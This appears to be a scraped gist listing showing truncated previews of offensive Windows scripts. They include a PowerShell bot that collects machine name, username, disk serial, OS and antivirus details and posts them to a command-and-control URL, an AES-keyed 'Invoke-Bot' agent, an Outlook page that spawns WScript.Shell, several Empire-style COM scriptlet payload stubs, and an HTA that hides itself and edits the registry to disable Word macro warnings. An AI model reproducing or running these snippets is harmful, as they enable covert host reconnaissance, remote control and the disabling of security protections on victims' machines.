This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $spl = 'BC_SPL';$vn = 'BC_Vic';$wTime = 1500;[System.Net.HttpWebRequest]$Req;function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi.replace('Microsoft Windows','Win') + ' SP' + (Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$u = $vn + '_' + $HWD + $spl + $mch + ' \ ' + $usr + $spl + $wi + $spl + $spl + 'PS1 0.1' + $spl + $av + $spl;return $u} catch {Start-Sleep -m $wTime}};function post ($cmdv, $v) { try { $Req = [System.Net.HttpWebRequest]::Create('http://127.0.0.1:1993/' + $cmdv);$Req.Method = 'POST';$Req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req.GetRequestStream();$buffer = [System.Text.Encoding]::UTF8.GetBytes([ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Invoke-DBC2{ | |
| Function Invoke-Bot{ | |
| $Global:secretIV = "Key@123Key@123fd" | |
| $Global:SecretKey = "secret#456!23key" | |
| Function Aes-Decrypt($DecryptData){ | |
| #Use the AES cipher and represent it as an object. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <meta http-equiv="Content-Language" content="en-us"> | |
| <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | |
| <title>Outlook</title> | |
| <script id=clientEventHandlersVBS language=vbscript> | |
| <!-- | |
| Sub window_onload() | |
| Set Application = ViewCtl1.OutlookApplication | |
| Set cmd = Application.CreateObject("Wscript.Shell") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <script type="text/vbscript"> | |
| Window.ReSizeTo 0, 0 | |
| Window.moveTo -2000,-2000 | |
| Set wso = CreateObject("WScript.Shell") | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="WzVQ" | |
| progid="WzVQ" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> |